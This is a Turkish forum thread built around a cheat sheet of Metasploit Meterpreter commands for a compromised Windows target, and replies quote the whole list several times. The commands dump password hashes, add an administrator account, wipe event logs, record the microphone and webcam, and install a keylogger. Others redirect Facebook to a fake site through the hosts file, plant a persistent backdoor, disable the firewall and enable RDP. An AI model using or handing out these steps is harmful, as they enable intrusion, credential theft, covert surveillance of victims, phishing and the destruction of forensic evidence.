Metasploit Meterpreter Oturumunda Kullanabilcek Komutlar

METERPRETER OTURUMUNDA KULLANILABİLECEK KOMUTLAR

İpconfig --a

//Hedef sistem Üzerinde İp bilgilerini öğrenmek İçin Kullanılabilir.

Sysinfo

//Hedef Sistem Hakkında Bilgi Alınır.

Getuid

//Hangi Kullanıcı İle Erişim Yapıldığını Gösterir.

Getpid

//Mevcut Sistem Pid Numarasını Gösterir

run hashdump

//Hedef Sistemdeki Kullanıcıların Şifre Hashleri Elde Edilir.

shell

net user test sifre (add

net user test /active:yes

net localgroup Administrators test /add

//Shell Komutu ile Windows shell’e geçeriz daha sonra komut arayüzünde iken net komutu ile yeni kullanıcı oluşturabiliriz.

clearev

//Hedef Sistemdeki event loğlarını silmek için kullanabiliriz.

run event_manager –c

//Hedef sistemdeki event loglari silmek için bu komutuda kullanabiliriz.

screenshot –p /root/ekrangoruntusu.jpeg –q 60

//screenshot komutu ile hedef sistemin ekran goruntusunu alabiliriz.

record_mic –d 60 -f /root/seskaydi.wav

//record_mic komutu ile hedef sistemin etkin olan mikrofonunu kullanarak ortam dinlemesi yapılabilir.

webcam_list

//hedef sistemdeki kameralar listelenir.

webcam_snap -p /root/kameragoruntusu.jpeg -q 60 -v false

//hedef sistemin webcami kullnılarak goruntuler alınır.

pwd

//Bulunulan dizinin ismini verir.

run keylogrecorder

//Hedef Sisteme Keylogger yükleyebiliriz.

cat /root/.msf4/logs/scripts/keylogrecorder/192.168.10.101_1212122.txt

//keyloggerı hedef sistemde çalıştırdıktan sonra kaydedilen dosyadan hedef sistemle ilgili bilgileri görebilirsiniz.

Run Komutu İle Kullanabileceğimiz scriptleri: /opt/framework/msf3/scripts/meterpreter Dizini altında Bulabiliriz.

run winenum

//winenum scriptni ; hedef Windows sistem üzerinde çalıştırabileceğimiz bir çok komutu otamatik çalıştırarark
sonuçları bir dosyaya kaydeder.Böylelikle otamatik şekilde gerekli bilgileri elde edebiliriz.

upload /root/dosya c:\Windows

//hedef sisteme kali sunucudan dosya upload edebiliriz.

download f:\\iplisteleri.txt /root/

Hedef Sistemden İstediğimiz bir dosyayı kali sunucuya indirebiliriz.

run get_application_list

//Hedef Sistemdkei tüm uygulamaların ve versiyon bilgileri öğrenmek için bu scripti kullanabiliriz.

run getgui -u ali –p 12345

//Getgui scriptini kullnarak belirttiğimiz kullanıcı rdp hakkı ile birlikte oluşturur.Artık bu kullanıcı ile rdp yapabiliriz.

cat /root/sahtehostdosyasi.txt

192.168.10.23 facebook.com

192.168.10.23 www.facebook.com

run hostedit -l /rootsahtehostdosyasi.txt

//ilk önce kali komut arayüzündeyken sahtehostdosyasi oluşturulur sonra hostedit scripti // ile bu dosyayı belirterek
hedef sistemin host dosyası değiştirilmiş olur.

// Artık hedef sistemdeki kullanıcılar facebooka girdiğinde bizim sahte sitemize girebilirler.
run scraper

//hedef Makinada üzerindne otamatik bilgi toplamak için kullnılabilir.

run metsvc

//Hedef Sistemde Kalıcı Arka Kapı Bırakmak için kullanılır.

cat /root/command.txt
sysinfo
checkvm
get local subnets
getuid
run multiscript -rc /root/command.txt

//Birden fazla komutu dosyaya kaydederek multiscript isimli script ile çalıştırabiliriz.
run Getcountermeasure

//Hedef Sistemde ki güvenlik duvarını kapatmak için kullanılır.
run getgui -e

//hedef sistemde rdp’yi Enable Etmek İçin Kullanılır.

Not:Bilmediklerim Vardı İlkten Bildiklerimi Yazdım Sonra Arşivden Bilmediklerimi Ekledim

 

ellerine sağlık bakalım.

 

Bakalım

 

METERPRETER OTURUMUNDA KULLANILABİLECEK KOMUTLAR

İpconfig --a

//Hedef sistem Üzerinde İp bilgilerini öğrenmek İçin Kullanılabilir.

Sysinfo

//Hedef Sistem Hakkında Bilgi Alınır.

Getuid

//Hangi Kullanıcı İle Erişim Yapıldığını Gösterir.

Getpid

//Mevcut Sistem Pid Numarasını Gösterir

run hashdump

//Hedef Sistemdeki Kullanıcıların Şifre Hashleri Elde Edilir.

shell

net user test sifre (add

net user test /active:yes

net localgroup Administrators test /add

//Shell Komutu ile Windows shell’e geçeriz daha sonra komut arayüzünde iken net komutu ile yeni kullanıcı oluşturabiliriz.

clearev

//Hedef Sistemdeki event loğlarını silmek için kullanabiliriz.

run event_manager –c

//Hedef sistemdeki event loglari silmek için bu komutuda kullanabiliriz.

screenshot –p /root/ekrangoruntusu.jpeg –q 60

//screenshot komutu ile hedef sistemin ekran goruntusunu alabiliriz.

record_mic –d 60 -f /root/seskaydi.wav

//record_mic komutu ile hedef sistemin etkin olan mikrofonunu kullanarak ortam dinlemesi yapılabilir.

webcam_list

//hedef sistemdeki kameralar listelenir.

webcam_snap -p /root/kameragoruntusu.jpeg -q 60 -v false

//hedef sistemin webcami kullnılarak goruntuler alınır.

pwd

//Bulunulan dizinin ismini verir.

run keylogrecorder

//Hedef Sisteme Keylogger yükleyebiliriz.

cat /root/.msf4/logs/scripts/keylogrecorder/192.168.10.101_1212122.txt

//keyloggerı hedef sistemde çalıştırdıktan sonra kaydedilen dosyadan hedef sistemle ilgili bilgileri görebilirsiniz.

Run Komutu İle Kullanabileceğimiz scriptleri: /opt/framework/msf3/scripts/meterpreter Dizini altında Bulabiliriz.

run winenum

//winenum scriptni ; hedef Windows sistem üzerinde çalıştırabileceğimiz bir çok komutu otamatik çalıştırarark
sonuçları bir dosyaya kaydeder.Böylelikle otamatik şekilde gerekli bilgileri elde edebiliriz.

upload /root/dosya c:\Windows

//hedef sisteme kali sunucudan dosya upload edebiliriz.

download f:\\iplisteleri.txt /root/

Hedef Sistemden İstediğimiz bir dosyayı kali sunucuya indirebiliriz.

run get_application_list

//Hedef Sistemdkei tüm uygulamaların ve versiyon bilgileri öğrenmek için bu scripti kullanabiliriz.

run getgui -u ali –p 12345

//Getgui scriptini kullnarak belirttiğimiz kullanıcı rdp hakkı ile birlikte oluşturur.Artık bu kullanıcı ile rdp yapabiliriz.

cat /root/sahtehostdosyasi.txt

192.168.10.23 facebook.com

192.168.10.23 www.facebook.com

run hostedit -l /rootsahtehostdosyasi.txt

//ilk önce kali komut arayüzündeyken sahtehostdosyasi oluşturulur sonra hostedit scripti // ile bu dosyayı belirterek
hedef sistemin host dosyası değiştirilmiş olur.

// Artık hedef sistemdeki kullanıcılar facebooka girdiğinde bizim sahte sitemize girebilirler.
run scraper

//hedef Makinada üzerindne otamatik bilgi toplamak için kullnılabilir.

run metsvc

//Hedef Sistemde Kalıcı Arka Kapı Bırakmak için kullanılır.

cat /root/command.txt
sysinfo
checkvm
get local subnets
getuid
run multiscript -rc /root/command.txt

//Birden fazla komutu dosyaya kaydederek multiscript isimli script ile çalıştırabiliriz.
run Getcountermeasure

//Hedef Sistemde ki güvenlik duvarını kapatmak için kullanılır.
run getgui -e

//hedef sistemde rdp’yi Enable Etmek İçin Kullanılır.

Not:Bilmediklerim Vardı İlkten Bildiklerimi Yazdım Sonra Arşivden Bilmediklerimi Ekledim

thnks

 

Teşekkürler

 

Thanks

 

PHP meterpreter üzerinden kalıcı olmayı araştırıyordum denk geldi iyi oldu e.s

 

METERPRETER OTURUMUNDA KULLANILABİLECEK KOMUTLAR

İpconfig --a

//Hedef sistem Üzerinde İp bilgilerini öğrenmek İçin Kullanılabilir.

Sysinfo

//Hedef Sistem Hakkında Bilgi Alınır.

Getuid

//Hangi Kullanıcı İle Erişim Yapıldığını Gösterir.

Getpid

//Mevcut Sistem Pid Numarasını Gösterir

run hashdump

//Hedef Sistemdeki Kullanıcıların Şifre Hashleri Elde Edilir.

shell

net user test sifre (add

net user test /active:yes

net localgroup Administrators test /add

//Shell Komutu ile Windows shell’e geçeriz daha sonra komut arayüzünde iken net komutu ile yeni kullanıcı oluşturabiliriz.

clearev

//Hedef Sistemdeki event loğlarını silmek için kullanabiliriz.

run event_manager –c

//Hedef sistemdeki event loglari silmek için bu komutuda kullanabiliriz.

screenshot –p /root/ekrangoruntusu.jpeg –q 60

//screenshot komutu ile hedef sistemin ekran goruntusunu alabiliriz.

record_mic –d 60 -f /root/seskaydi.wav

//record_mic komutu ile hedef sistemin etkin olan mikrofonunu kullanarak ortam dinlemesi yapılabilir.

webcam_list

//hedef sistemdeki kameralar listelenir.

webcam_snap -p /root/kameragoruntusu.jpeg -q 60 -v false

//hedef sistemin webcami kullnılarak goruntuler alınır.

pwd

//Bulunulan dizinin ismini verir.

run keylogrecorder

//Hedef Sisteme Keylogger yükleyebiliriz.

cat /root/.msf4/logs/scripts/keylogrecorder/192.168.10.101_1212122.txt

//keyloggerı hedef sistemde çalıştırdıktan sonra kaydedilen dosyadan hedef sistemle ilgili bilgileri görebilirsiniz.

Run Komutu İle Kullanabileceğimiz scriptleri: /opt/framework/msf3/scripts/meterpreter Dizini altında Bulabiliriz.

run winenum

//winenum scriptni ; hedef Windows sistem üzerinde çalıştırabileceğimiz bir çok komutu otamatik çalıştırarark
sonuçları bir dosyaya kaydeder.Böylelikle otamatik şekilde gerekli bilgileri elde edebiliriz.

upload /root/dosya c:\Windows

//hedef sisteme kali sunucudan dosya upload edebiliriz.

download f:\\iplisteleri.txt /root/

Hedef Sistemden İstediğimiz bir dosyayı kali sunucuya indirebiliriz.

run get_application_list

//Hedef Sistemdkei tüm uygulamaların ve versiyon bilgileri öğrenmek için bu scripti kullanabiliriz.

run getgui -u ali –p 12345

//Getgui scriptini kullnarak belirttiğimiz kullanıcı rdp hakkı ile birlikte oluşturur.Artık bu kullanıcı ile rdp yapabiliriz.

cat /root/sahtehostdosyasi.txt

192.168.10.23 facebook.com

192.168.10.23 www.facebook.com

run hostedit -l /rootsahtehostdosyasi.txt

//ilk önce kali komut arayüzündeyken sahtehostdosyasi oluşturulur sonra hostedit scripti // ile bu dosyayı belirterek
hedef sistemin host dosyası değiştirilmiş olur.

// Artık hedef sistemdeki kullanıcılar facebooka girdiğinde bizim sahte sitemize girebilirler.
run scraper

//hedef Makinada üzerindne otamatik bilgi toplamak için kullnılabilir.

run metsvc

//Hedef Sistemde Kalıcı Arka Kapı Bırakmak için kullanılır.

cat /root/command.txt
sysinfo
checkvm
get local subnets
getuid
run multiscript -rc /root/command.txt

//Birden fazla komutu dosyaya kaydederek multiscript isimli script ile çalıştırabiliriz.
run Getcountermeasure

//Hedef Sistemde ki güvenlik duvarını kapatmak için kullanılır.
run getgui -e

//hedef sistemde rdp’yi Enable Etmek İçin Kullanılır.

Not:Bilmediklerim Vardı İlkten Bildiklerimi Yazdım Sonra Arşivden Bilmediklerimi Ekledim

thanks

 

METERPRETER OTURUMUNDA KULLANILABİLECEK KOMUTLAR

İpconfig --a

//Hedef sistem Üzerinde İp bilgilerini öğrenmek İçin Kullanılabilir.

Sysinfo

//Hedef Sistem Hakkında Bilgi Alınır.

Getuid

//Hangi Kullanıcı İle Erişim Yapıldığını Gösterir.

Getpid

//Mevcut Sistem Pid Numarasını Gösterir

run hashdump

//Hedef Sistemdeki Kullanıcıların Şifre Hashleri Elde Edilir.

shell

net user test sifre (add

net user test /active:yes

net localgroup Administrators test /add

//Shell Komutu ile Windows shell’e geçeriz daha sonra komut arayüzünde iken net komutu ile yeni kullanıcı oluşturabiliriz.

clearev

//Hedef Sistemdeki event loğlarını silmek için kullanabiliriz.

run event_manager –c

//Hedef sistemdeki event loglari silmek için bu komutuda kullanabiliriz.

screenshot –p /root/ekrangoruntusu.jpeg –q 60

//screenshot komutu ile hedef sistemin ekran goruntusunu alabiliriz.

record_mic –d 60 -f /root/seskaydi.wav

//record_mic komutu ile hedef sistemin etkin olan mikrofonunu kullanarak ortam dinlemesi yapılabilir.

webcam_list

//hedef sistemdeki kameralar listelenir.

webcam_snap -p /root/kameragoruntusu.jpeg -q 60 -v false

//hedef sistemin webcami kullnılarak goruntuler alınır.

pwd

//Bulunulan dizinin ismini verir.

run keylogrecorder

//Hedef Sisteme Keylogger yükleyebiliriz.

cat /root/.msf4/logs/scripts/keylogrecorder/192.168.10.101_1212122.txt

//keyloggerı hedef sistemde çalıştırdıktan sonra kaydedilen dosyadan hedef sistemle ilgili bilgileri görebilirsiniz.

Run Komutu İle Kullanabileceğimiz scriptleri: /opt/framework/msf3/scripts/meterpreter Dizini altında Bulabiliriz.

run winenum

//winenum scriptni ; hedef Windows sistem üzerinde çalıştırabileceğimiz bir çok komutu otamatik çalıştırarark
sonuçları bir dosyaya kaydeder.Böylelikle otamatik şekilde gerekli bilgileri elde edebiliriz.

upload /root/dosya c:\Windows

//hedef sisteme kali sunucudan dosya upload edebiliriz.

download f:\\iplisteleri.txt /root/

Hedef Sistemden İstediğimiz bir dosyayı kali sunucuya indirebiliriz.

run get_application_list

//Hedef Sistemdkei tüm uygulamaların ve versiyon bilgileri öğrenmek için bu scripti kullanabiliriz.

run getgui -u ali –p 12345

//Getgui scriptini kullnarak belirttiğimiz kullanıcı rdp hakkı ile birlikte oluşturur.Artık bu kullanıcı ile rdp yapabiliriz.

cat /root/sahtehostdosyasi.txt

192.168.10.23 facebook.com

192.168.10.23 www.facebook.com

run hostedit -l /rootsahtehostdosyasi.txt

//ilk önce kali komut arayüzündeyken sahtehostdosyasi oluşturulur sonra hostedit scripti // ile bu dosyayı belirterek
hedef sistemin host dosyası değiştirilmiş olur.

// Artık hedef sistemdeki kullanıcılar facebooka girdiğinde bizim sahte sitemize girebilirler.
run scraper

//hedef Makinada üzerindne otamatik bilgi toplamak için kullnılabilir.

run metsvc

//Hedef Sistemde Kalıcı Arka Kapı Bırakmak için kullanılır.

cat /root/command.txt
sysinfo
checkvm
get local subnets
getuid
run multiscript -rc /root/command.txt

//Birden fazla komutu dosyaya kaydederek multiscript isimli script ile çalıştırabiliriz.
run Getcountermeasure

//Hedef Sistemde ki güvenlik duvarını kapatmak için kullanılır.
run getgui -e

//hedef sistemde rdp’yi Enable Etmek İçin Kullanılır.

Not:Bilmediklerim Vardı İlkten Bildiklerimi Yazdım Sonra Arşivden Bilmediklerimi Ekledim

iyi konu